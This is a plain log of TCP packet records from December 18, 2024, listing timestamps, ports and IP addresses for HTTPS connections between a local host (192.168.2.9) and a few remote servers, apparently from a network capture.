Dec 18, 2024 21:09:40.894912958 CET	49841	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:40.895267010 CET	49841	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:40.895347118 CET	443	49841	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:40.933248043 CET	49840	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:40.933265924 CET	443	49840	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:40.948138952 CET	49841	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:40.948165894 CET	443	49841	204.79.197.219	192.168.2.9
Dec 18, 2024 21:09:40.978835106 CET	49840	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:40.993534088 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.993601084 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.994124889 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.994148016 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.995697975 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.995704889 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.995758057 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.995769978 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.995776892 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.995779991 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.995872021 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.995894909 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.996022940 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.996114969 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.996227026 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.996246099 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.996258974 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.996267080 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:40.996273041 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:40.996285915 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:41.001539946 CET	49841	443	192.168.2.9	204.79.197.219
Dec 18, 2024 21:09:41.068059921 CET	443	49837	20.110.205.119	192.168.2.9
Dec 18, 2024 21:09:41.068253040 CET	443	49837	20.110.205.119	192.168.2.9
Dec 18, 2024 21:09:41.070730925 CET	49837	443	192.168.2.9	20.110.205.119
Dec 18, 2024 21:09:41.074858904 CET	49837	443	192.168.2.9	20.110.205.119
Dec 18, 2024 21:09:41.074888945 CET	443	49837	20.110.205.119	192.168.2.9
Dec 18, 2024 21:09:42.251751900 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.252286911 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.252726078 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.252732992 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.254462957 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.254468918 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.254533052 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.254544020 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.254549026 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.254553080 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.254636049 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.255203009 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256195068 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.256256104 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256721020 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.256732941 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256756067 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.256767035 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256772995 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.256777048 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256855965 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.256864071 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256885052 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.256891012 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256906986 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.256912947 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256936073 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.256944895 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256961107 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.256961107 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.256968975 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256978035 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.256988049 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257008076 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257019997 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.257023096 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257036924 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.257040977 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257046938 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.257050991 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257050991 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257055998 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.257061005 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.257093906 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257101059 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.257123947 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257128954 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.257144928 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257154942 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257205963 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257222891 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257232904 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257249117 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257289886 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257302999 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257364035 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257388115 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257405043 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257417917 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257461071 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257468939 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.257477999 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299324989 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.299516916 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299550056 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299567938 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299572945 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299585104 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299596071 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299607992 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299612999 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299628973 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299639940 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299665928 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299681902 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299691916 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299720049 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299736977 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299753904 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.299762011 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347321987 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.347475052 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347501993 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347510099 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347518921 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347562075 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347578049 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347585917 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347595930 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347645998 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347662926 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347675085 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347718954 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347742081 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347757101 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347800970 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.347975969 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.395325899 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.395632029 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.395858049 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.395956993 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.395993948 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.396015882 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.396025896 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.396033049 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.396074057 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.439373016 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.496170044 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.496371984 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.496398926 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.499335051 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.499380112 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.547341108 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.616456032 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.616642952 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.616697073 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.616759062 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.616777897 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.616833925 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.616857052 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.616869926 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.663382053 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.736169100 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.736334085 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.736438036 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.736470938 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.736589909 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.736654043 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.736879110 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.737140894 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.737674952 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.737801075 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.738367081 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.747247934 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.747275114 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.747292042 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.747342110 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.747360945 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.747379065 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.747422934 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.747451067 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.747459888 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.747476101 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.759655952 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.759835958 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.759864092 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.759932995 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.763488054 CET	49842	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.763530970 CET	443	49842	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.764918089 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.765006065 CET	443	49850	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.765115023 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.768840075 CET	49850	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.768877983 CET	443	49850	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.787338018 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.787535906 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.787571907 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.787580967 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.787589073 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.835325003 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.855560064 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.855704069 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.855766058 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.855896950 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.857903957 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.858042002 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.858086109 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.858139038 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.860754967 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.861218929 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861228943 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.861264944 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861320019 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861339092 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861372948 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.861378908 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861418962 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861419916 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.861435890 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861453056 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861668110 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861707926 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861725092 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861766100 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861882925 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861949921 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.861969948 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.862801075 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.863358021 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.866328955 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866341114 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.866374969 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866384029 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866398096 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866429090 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866440058 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866481066 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866497040 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866508961 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866528988 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866559982 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866564989 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.866590023 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907356977 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.907697916 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907721043 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907742977 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907749891 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907768965 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907778978 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907793045 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907871962 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907968044 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907979965 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.907994986 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.955331087 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.970117092 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.970272064 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.970294952 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.970350027 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.970396042 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.970679998 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.970705032 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.970804930 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.976269960 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.976387978 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.976501942 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.976684093 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.976718903 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.976830959 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.976886034 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.977025032 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.977144957 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.978915930 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.979191065 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.979305983 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.979332924 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.979387999 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.979635000 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.979753017 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.979777098 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.981513023 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.981550932 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.981834888 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.981941938 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.982059002 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.982125044 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.982270002 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.982429981 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.984026909 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.984143972 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.984322071 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.984412909 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.984428883 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.984551907 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.984622955 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.984656096 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.984988928 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.985807896 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.985920906 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.986033916 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.986124039 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.986231089 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.986347914 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.986464977 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.986507893 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.986707926 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.987426043 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.987601042 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.987718105 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.987799883 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.987915039 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.987945080 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.988025904 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.988126993 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.989042997 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.989304066 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.989350080 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.989461899 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.989562988 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.989605904 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.989788055 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.990474939 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.990533113 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.990588903 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.990775108 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.990906000 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.991075039 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.991204023 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:42.991261005 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.991406918 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:42.991533041 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.035377979 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.090302944 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.090445042 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.090504885 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.090625048 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.090811968 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.090936899 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.091424942 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.091485977 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.091545105 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.091645002 CET	49846	443	192.168.2.9	94.130.191.168
Dec 18, 2024 21:09:43.091692924 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.092041016 CET	443	49846	94.130.191.168	192.168.2.9
Dec 18, 2024 21:09:43.092156887 CET	49846	443	192.168.2.9	94.130.191.168
